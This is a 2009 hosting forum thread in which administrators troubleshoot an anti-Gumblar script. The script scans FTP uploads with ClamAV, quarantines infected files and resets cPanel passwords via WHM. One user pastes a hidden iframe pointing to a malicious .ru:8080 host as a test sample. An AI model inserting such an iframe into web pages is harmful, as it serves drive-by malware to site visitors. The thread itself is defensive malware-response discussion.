This is Remote Access Key. Script using this key for access to whm and changing password of attacked domain.Originally Posted by isputra
You have to access WHM as root for getting this key. Use this url after login to whm : http://www.yourserver.net:2086/scripts/setrhash
or find Set Remote Access Key link on left menu...
hidonet
What your script is not doing is:
does not log IP,
does not block IP,
does not change password.
It would be good if you can fix that, below is the sample mail that I get after an attack happens:
Warning !!!
17.08.2009 12:26:52 Monday
There is a GUMBLAR ATTACK on account
Infected file : /home/vncind/public_html/support/templates/Bliss/images/index.php
Infection : .ru:8080/ at line 50
Action : File moved to : /karantina/clamav//index.php.20090817122652
Password might be changed to : ibHpcgHVOk
Ret : Array<passwd>
<passwd>
<rawout></rawout>
<services></services>
<status>0</status>
<statusmsg>No account was specified.</statusmsg>
</passwd>
</passwd>
<!-- Web Host Manager (c) cPanel, Inc. 2008 cPanel Inc. Unauthorized copying is prohibited. -->
Process Killed :
Vinayak Sharma
Vinsar.Net - Quality WebHosting Services at Economical Price USA & UK Servers
Book Your Domain with Confidence Reliable Domain Reseller Account
does not log IP,
if your FTP server not adds log to /var/log/messages ip will not discovered
does not block IP,
if your FTP server not adds log to /var/log/messages ip will not discovered
does not change password.
I think your ftp_clamscan.sh is old or WHM Remote Access Key is wrong
Are you trying latest files ?
If you can't solve I can help you... my msn address is msndestek@oxio.net
Last edited by hidonet; 08-17-2009 at 10:30 AM.
Do you mean ftp_clamscan.sh and ftp_clamscan.php are two different files?
I am using only ftp_clamscan.php that is provided by you at http://www.oxio.net/anti_gumblar/ftp_clamscan.phps
I have followed the instructions at Anti-Gumblar Protection Documentation
If the file ftp_clamscan.sh is a different file, where to get it from and where to read more about it?
Vinayak Sharma
Vinsar.Net - Quality WebHosting Services at Economical Price USA & UK Servers
Book Your Domain with Confidence Reliable Domain Reseller Account
Yes ftp_clamscan.sh and ftp_clamscan.php is different files. ftp_clamscan.sh is passing FTP values to ftp_clamscan.php. If you don't use .sh file username will not discovered...
I will fix documentation if there is mistake and I will use only PHP file in next release...
Last edited by hidonet; 08-17-2009 at 01:48 PM.
But as of now where is the file ftp_clamscan.sh, from where can we download this file?
Vinayak Sharma
Vinsar.Net - Quality WebHosting Services at Economical Price USA & UK Servers
Book Your Domain with Confidence Reliable Domain Reseller Account
You'll find all needed files in http://www.oxio.net/anti_gumblar/anti_gumblar.tar.gz...
Note : PHP File source on site is just for information...
There is only ftp_clamscan.php file in http://www.oxio.net/anti_gumblar/anti_gumblar.tar.gz no ftp_clamscan.sh, can you please include both the files in that tar file.
Vinayak Sharma
Vinsar.Net - Quality WebHosting Services at Economical Price USA & UK Servers
Book Your Domain with Confidence Reliable Domain Reseller Account
Hi,
I notice that the script will scan the overwrited file and move it to quarantine.
Eg : public_html/index.php and if the attack is overwrite the index.php , the existing index.php will be remove and moved to quarantine folder.
Is there anyway, that we can avoid the overwrite and avoid removal of existing index.php file ?
Probably scanning during the upload before the overwrite happened ?
I want to scan before overwrite but this is not possible at this time.Hi,
I notice that the script will scan the overwrited file and move it to quarantine.
Eg : public_html/index.php and if the attack is overwrite the index.php , the existing index.php will be remove and moved to quarantine folder.
Is there anyway, that we can avoid the overwrite and avoid removal of existing index.php file ?
Probably scanning during the upload before the overwrite happened ?
I've contacted to author of PureFTPd and asked him. He did not replied me yet.
Sorry for that. Please download and try again...
It's not working. After install this script like the manual and restart FTP then i try to upload file with this code in it :
The file i called if-rame.html still can through the FTP process and reside on server without rejection from this script.PHP Code:<iframe src="http://39q.ru:8080/index.php" width=124 height=163 style="visibility: hidden"></iframe>
So.. how to get this script working ?
It's me ...... It's me ......
I'm going to update my script.
these changes will be applied to script very soon:
1 ) sh files need not be
2 ) user name will be extracted from the file path. This was a bug. Pure FTP not returning username and other arguments.
3 ) i will try to extract clean copy of infected file from backup.
Have pureftpd author responded to your question regarding scanning while uploading ?
I think this will be better solution.
no response from author
LinkBack URL
About LinkBacks
Reply With Quote